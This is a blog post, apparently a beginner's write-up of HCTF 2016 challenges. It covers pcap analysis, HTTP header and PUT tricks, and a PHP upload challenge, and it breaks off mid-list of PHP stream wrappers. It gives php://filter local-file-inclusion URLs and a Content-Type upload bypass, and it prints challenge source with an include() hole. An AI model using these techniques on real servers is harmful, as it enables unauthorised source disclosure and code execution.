<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="CTF," />





  <link rel="alternate" href="/atom.xml" title="Headwind's Blog" type="application/atom+xml" />






<meta name="description" content="写在开头的话2016HCTF应该是我第一场比较认真参加的一场CTF了，由于还是个萌新，啥都不懂，这篇文章就是把当时自己做出来的题的做题思路记录一下（其实早该发了，但是因为我懒【捂脸】），让各位dalao见笑了官方wp在这→HCTF 2016网络攻防大赛官方Writeup膜拜杭电各位大佬 第一层MISC 杂项签到http://139.224.54.27/webco1a/+_+.pcapng用wire">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="2016HCTF-writeup">
<meta property="og:url" content="http://h34dw1nd.github.io/2017/01/01/2016HCTF-writeup/index.html">
<meta property="og:site_name" content="Headwind&#39;s Blog">
<meta property="og:description" content="写在开头的话2016HCTF应该是我第一场比较认真参加的一场CTF了，由于还是个萌新，啥都不懂，这篇文章就是把当时自己做出来的题的做题思路记录一下（其实早该发了，但是因为我懒【捂脸】），让各位dalao见笑了官方wp在这→HCTF 2016网络攻防大赛官方Writeup膜拜杭电各位大佬 第一层MISC 杂项签到http://139.224.54.27/webco1a/+_+.pcapng用wire">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/ex1-1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/ex1-2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/web2009.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/gogogo-1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/gogogo-2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/%E5%85%B5%E8%80%85%E5%A4%9A%E8%AF%A1-5.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/教练我想打CTF-2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/教练我想打CTF-3.png">
<meta property="og:updated_time" content="2017-12-18T13:19:32.227Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2016HCTF-writeup">
<meta name="twitter:description" content="写在开头的话2016HCTF应该是我第一场比较认真参加的一场CTF了，由于还是个萌新，啥都不懂，这篇文章就是把当时自己做出来的题的做题思路记录一下（其实早该发了，但是因为我懒【捂脸】），让各位dalao见笑了官方wp在这→HCTF 2016网络攻防大赛官方Writeup膜拜杭电各位大佬 第一层MISC 杂项签到http://139.224.54.27/webco1a/+_+.pcapng用wire">
<meta name="twitter:image" content="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/ex1-1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: 'KAGR71U25A',
      apiKey: '',
      indexName: 'blog',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://h34dw1nd.github.io/2017/01/01/2016HCTF-writeup/"/>





  <title>2016HCTF-writeup | Headwind's Blog</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-111355270-1', 'auto');
  ga('send', 'pageview');
</script>





</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Headwind's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://h34dw1nd.github.io/2017/01/01/2016HCTF-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Headwind">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://avatars1.githubusercontent.com/u/15635180?s=460&v=4">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Headwind's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2016HCTF-writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-01-01T00:27:32+08:00">
                2017-01-01
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2017/01/01/2016HCTF-writeup/" class="leancloud_visitors" data-flag-title="2016HCTF-writeup">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="写在开头的话"><a href="#写在开头的话" class="headerlink" title="写在开头的话"></a>写在开头的话</h2><p>2016HCTF应该是我第一场比较认真参加的一场CTF了，由于还是个萌新，啥都不懂，这篇文章就是把当时自己做出来的题的做题思路记录一下（其实早该发了，但是因为我懒【捂脸】），让各位dalao见笑了<br>官方wp在这→<a href="http://www.freebuf.com/articles/web/121778.html" target="_blank" rel="noopener">HCTF 2016网络攻防大赛官方Writeup</a><br>膜拜杭电各位大佬</p>
<h2 id="第一层"><a href="#第一层" class="headerlink" title="第一层"></a>第一层</h2><h3 id="MISC-杂项签到"><a href="#MISC-杂项签到" class="headerlink" title="MISC 杂项签到"></a>MISC 杂项签到</h3><p><a href="http://139.224.54.27/webco1a/+_+.pcapng" target="_blank" rel="noopener">http://139.224.54.27/webco1a/+_+.pcapng</a><br>用wireshark打开流量包，追踪TCP流，发现是一个webshell的流量，看到webshell控制端查看了远程服务器上的两个关键文件：function.py和flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">cat function.py</span><br><span class="line"></span><br><span class="line">#!/usr/bin/env python</span><br><span class="line"># coding:utf-8</span><br><span class="line">__author__ = &apos;Aklis&apos;</span><br><span class="line"></span><br><span class="line">from Crypto import Random</span><br><span class="line">from Crypto.Cipher import AES</span><br><span class="line"></span><br><span class="line">import sys</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def decrypt(encrypted, passphrase):</span><br><span class="line">  IV = encrypted[:16]</span><br><span class="line">  aes = AES.new(passphrase, AES.MODE_CBC, IV)</span><br><span class="line">  return aes.decrypt(encrypted[16:])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def encrypt(message, passphrase):</span><br><span class="line">  IV = message[:16]</span><br><span class="line">  length = 16</span><br><span class="line">  count = len(message)</span><br><span class="line">  padding = length - (count % length)</span><br><span class="line">  message = message + &apos;\0&apos; * padding</span><br><span class="line">  aes = AES.new(passphrase, AES.MODE_CBC, IV)</span><br><span class="line">  return aes.encrypt(message)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">IV = &apos;YUFHJKVWEASDGQDH&apos;</span><br><span class="line"></span><br><span class="line">message = IV + &apos;flag is hctf&#123;xxxxxxxxxxxxxxx&#125;&apos;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">print len(message)</span><br><span class="line"></span><br><span class="line">example = encrypt(message, &apos;Qq4wdrhhyEWe4qBF&apos;)</span><br><span class="line">print example</span><br><span class="line">example = decrypt(example, &apos;Qq4wdrhhyEWe4qBF&apos;) </span><br><span class="line">print example</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat flag:</span><br><span class="line">mbZoEMrhAO0WWeugNjqNw3U6Tt2C+rwpgpbdWRZgfQI3MAh0sZ9qjnziUKkV90XhAOkIs/OXoYVw5uQDjVvgNA==</span><br></pre></td></tr></table></figure>
<p>flag明显是个base64编码后的字符串，将其解码后再用function.py和decrypt函数解密：<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/ex1-1.png" alt=""></p>
<p>运行得到flag：<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/ex1-2.png" alt=""></p>
<hr>
<h3 id="Web-2099年的flag"><a href="#Web-2099年的flag" class="headerlink" title="Web 2099年的flag"></a>Web 2099年的flag</h3><p>由ios99想到改user-agent，抓包改一下：<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/web2009.png" alt=""></p>
<hr>
<h2 id="第二层"><a href="#第二层" class="headerlink" title="第二层"></a>第二层</h2><h3 id="Web-RESTFUL"><a href="#Web-RESTFUL" class="headerlink" title="Web RESTFUL"></a>Web RESTFUL</h3><p><a href="http://jinjia.hctf.io/index.php" target="_blank" rel="noopener">http://jinjia.hctf.io/index.php</a><br>打开看到页面下方有提示：<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-1.png" alt=""><br>用PUT方法传个参<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-2.png" alt=""><br>因为刚接触web，不懂RESTful是什么，查了一下RESTful，发现是一种web软件架构<br><a href="http://www.ruanyifeng.com/blog/2011/09/restful" target="_blank" rel="noopener">理解RESTful架构</a><br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-3.png" alt=""><br>改个包，flag出来了<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/restful-4.png" alt=""></p>
<h3 id="MISC-gogogo"><a href="#MISC-gogogo" class="headerlink" title="MISC gogogo"></a>MISC gogogo</h3><p>下载下来，发现是个.nes的红白机文件，用FcEuX打开，看到了经典的魂斗罗<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/gogogo-1.png" alt="9"><br>按照 <a href="http://wenku.baidu.com/link?url=1i4slMmKov6LncwLAwa-VmJmAwRwIkgcK-xzls2uOnuJzS7wrsG_mjDdVOVbQzG0Q5p6NmRzcd-vBIbpuWihXEdoiQWs6dsc03aggjzd3Ty" target="_blank" rel="noopener">http://wenku.baidu.com/link?url=1i4slMmKov6LncwLAwa-VmJmAwRwIkgcK-xzls2uOnuJzS7wrsG_mjDdVOVbQzG0Q5p6NmRzcd-vBIbpuWihXEdoiQWs6dsc03aggjzd3Ty</a> 所说的来修改成无限命和不坏金身，打通关就看到了：<br><img src="https://raw.githubusercontent.com/h34dw1nd/MyBlogPictures/master/2016HCTF-writeup/gogogo-2.png" alt=""></p>
<h3 id="Web-兵者多诡"><a href="#Web-兵者多诡" class="headerlink" title="Web 兵者多诡"></a>Web 兵者多诡</h3><p><a href="http://pics.hctf.io/home.php?key=hduisa123" target="_blank" rel="noopener">http://pics.hctf.io/home.php?key=hduisa123</a><br>参考文章<a href="http://www.hackdig.com/09/hack-26779.htm" target="_blank" rel="noopener">http://www.hackdig.com/09/hack-26779.htm</a><br>看到文件上传页面 猜测是上传漏洞，页面说明只能上传png文件<br>尝试了几次后发现验证方式是对content-type验证，为image/png即可，但是上传后的文件会被重新命名并加上.png后缀。<br>发现允许使用php伪协议：<br><a href="http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=upload" target="_blank" rel="noopener">http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=upload</a><br><a href="http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=home" target="_blank" rel="noopener">http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=home</a><br><a href="http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=function" target="_blank" rel="noopener">http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=function</a><br><a href="http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=show" target="_blank" rel="noopener">http://pics.hctf.io/home.php?fp=php://filter/convert.base64-encode/resource=show</a><br>把源码扒下来，base64解码，<br>home.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line">@session_start();</span><br><span class="line">posix_setuid(1000);</span><br><span class="line"></span><br><span class="line">$fp = empty($_GET[&apos;fp&apos;]) ? &apos;fail&apos; : $_GET[&apos;fp&apos;];</span><br><span class="line">if(preg_match(&apos;/\.\./&apos;,$fp))</span><br><span class="line">&#123;</span><br><span class="line">	die(&apos;No No No!&apos;);</span><br><span class="line">&#125;</span><br><span class="line">if(preg_match(&apos;/rm/i&apos;,$_SERVER[&quot;QUERY_STRING&quot;]))</span><br><span class="line">&#123;</span><br><span class="line">	die();</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">	&lt;head&gt;</span><br><span class="line">		&lt;title&gt;&lt;/title&gt;</span><br><span class="line">		&lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">		&lt;link href=&quot;css/bootstrap.min.css&quot; rel=&quot;stylesheet&quot;&gt;</span><br><span class="line">		&lt;link href=&quot;css/jumbotron-narrow.css&quot; rel=&quot;stylesheet&quot;&gt;</span><br><span class="line">	&lt;/head&gt;</span><br><span class="line">	&lt;body&gt;</span><br><span class="line">		&lt;div class=&quot;container&quot;&gt;</span><br><span class="line">			&lt;div class=&quot;header clearfix&quot;&gt;</span><br><span class="line">				&lt;nav&gt;</span><br><span class="line">					&lt;ul class=&quot;nav nav-pills pull-right&quot;&gt;</span><br><span class="line">						&lt;li role=&quot;presentation&quot; class=&quot;active&quot;&gt;&lt;a href=&quot;home.php?key=hduisa123&quot;&gt;Home&lt;/a&gt;&lt;/li&gt;</span><br><span class="line">					&lt;/ul&gt;</span><br><span class="line">				&lt;/nav&gt;</span><br><span class="line">				&lt;h3 class=&quot;text-muted&quot;&gt;pictures&lt;/h3&gt;</span><br><span class="line">			&lt;/div&gt;</span><br><span class="line"></span><br><span class="line">			&lt;div class=&quot;jumbotron&quot;&gt;</span><br><span class="line">				&lt;h1&gt;Pictures Storage&lt;/h1&gt;</span><br><span class="line">				&lt;p class=&quot;lead&quot;&gt;在这里上传您的图片,我们将为您保存&lt;/p&gt;</span><br><span class="line">				&lt;form action=&quot;?fp=upload&quot; method=&quot;POST&quot; id=&quot;form&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">					&lt;input type=&quot;file&quot; id=&quot;image&quot; name=&quot;image&quot; class=&quot;btn btn-lg btn-success&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;</span><br><span class="line">					&lt;br&gt;</span><br><span class="line">					&lt;input type=&quot;submit&quot; id=&quot;submit&quot; name=&quot;submit&quot; class=&quot;btn btn-lg btn-success&quot; role=&quot;button&quot; value=&quot;上传图片&quot;&gt;</span><br><span class="line">				&lt;/form&gt;</span><br><span class="line">			&lt;/div&gt;</span><br><span class="line">	   	&lt;/div&gt; </span><br><span class="line">	&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line">&lt;?php  </span><br><span class="line">if($fp !== &apos;fail&apos;)</span><br><span class="line">&#123;</span><br><span class="line">	if(!(include($fp.&apos;.php&apos;)))</span><br><span class="line">	&#123;</span><br><span class="line">		?&gt;</span><br><span class="line">		&lt;div class=&quot;alert alert-danger&quot; role=&quot;alert&quot;&gt;没有此页面&lt;/div&gt;</span><br><span class="line">		&lt;?php</span><br><span class="line">			exit;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>upload.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">include &apos;function.php&apos;;</span><br><span class="line">if(isset($_POST[&apos;submit&apos;]) &amp;&amp; !empty($_FILES[&apos;image&apos;][&apos;tmp_name&apos;]))</span><br><span class="line">&#123;	</span><br><span class="line">	$name = $_FILES[&apos;image&apos;][&apos;tmp_name&apos;];</span><br><span class="line">	$type = $_FILES[&apos;image&apos;][&apos;type&apos;];</span><br><span class="line">	$size = $_FILES[&apos;image&apos;][&apos;size&apos;];</span><br><span class="line"></span><br><span class="line">	if(!is_uploaded_file($name))</span><br><span class="line">	&#123;</span><br><span class="line">		?&gt;</span><br><span class="line">		&lt;div class=&quot;alert alert-danger&quot; role=&quot;alert&quot;&gt;图片上传失败,请重新上传&lt;/div&gt;</span><br><span class="line">		&lt;?php</span><br><span class="line">			exit;</span><br><span class="line">	&#125;	</span><br><span class="line"></span><br><span class="line">	if($type !== &apos;image/png&apos;)</span><br><span class="line">	&#123;</span><br><span class="line">		?&gt;</span><br><span class="line">		&lt;div class=&quot;alert alert-danger&quot; role=&quot;alert&quot;&gt;只能上传PNG图片&lt;/div&gt;</span><br><span class="line">		&lt;?php</span><br><span class="line">			exit;</span><br><span class="line">	&#125; 	</span><br><span class="line"></span><br><span class="line">	if($size &gt; 10240)</span><br><span class="line">	&#123;</span><br><span class="line">		?&gt;</span><br><span class="line">		&lt;div class=&quot;alert alert-danger&quot; role=&quot;alert&quot;&gt;图片大小超过10KB&lt;/div&gt;</span><br><span class="line">		&lt;?php</span><br><span class="line">			exit;	</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	$imagekey = create_imagekey();</span><br><span class="line">	move_uploaded_file($name,&quot;uploads/$imagekey.png&quot;);</span><br><span class="line"></span><br><span class="line">	echo &quot;&lt;script&gt;location.href=&apos;?fp=show&amp;imagekey=$imagekey&apos;&lt;/script&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>show.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">$imagekey = $_GET[&apos;imagekey&apos;];</span><br><span class="line">if(empty($imagekey))</span><br><span class="line">&#123;</span><br><span class="line">	echo &quot;&lt;script&gt;location.href=&apos;home.php&apos;&lt;/script&gt;&quot;;</span><br><span class="line">	exit;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line">&lt;div class=&quot;alert alert-success&quot; role=&quot;alert&quot;&gt;</span><br><span class="line">	上传成功,&lt;a href=&quot;uploads/&lt;?php echo $imagekey; ?&gt;.png&quot; class=&quot;alert-link&quot;&gt;点此查看&lt;/a&gt;</span><br><span class="line">&lt;/div&gt;</span><br></pre></td></tr></table></figure></p>
<p>function.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">	function create_imagekey()</span><br><span class="line">	&#123;</span><br><span class="line">		return sha1($_SERVER[&apos;REMOTE_ADDR&apos;] . $_SERVER[&apos;HTTP_USER_AGENT&apos;] . time() . mt_rand());</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>发现home.php中存在本地文件包含:<code>if(!(include($fp.’.php’)))</code>，fp参数可控制，然后会在文件名后加一个.php进行文件包含，因此我们可以上传我们需要包含的文件。但是直接包含肯定是不行的，需要构造文件名。<br>查询PHP手册发现PHP支持如下的Wrappers：</p>
<pre><code>file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
zlib:// — Compression Streams
data:// — Data (RFC 2397)
glob:// — Find pathnames matching pattern
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — Audio streams
expect:// — Process Interaction Streams
